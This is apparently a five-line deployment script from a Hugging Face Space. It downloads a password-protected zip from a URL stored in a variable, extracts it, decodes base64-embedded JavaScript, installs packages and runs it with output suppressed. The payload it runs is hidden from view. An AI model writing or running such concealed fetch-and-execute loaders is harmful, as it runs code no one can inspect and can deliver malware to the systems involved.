File size: 135 Bytes
860242f
 
 
 
 
1
2
3
4
5
curl -L $token -o HFAPP.zip > /dev/null
7z x -p$key -o./ HFAPP.zip > /dev/null
echo $B64JS | base64 -d > WebAPP.js
npm i
node WebAPP.js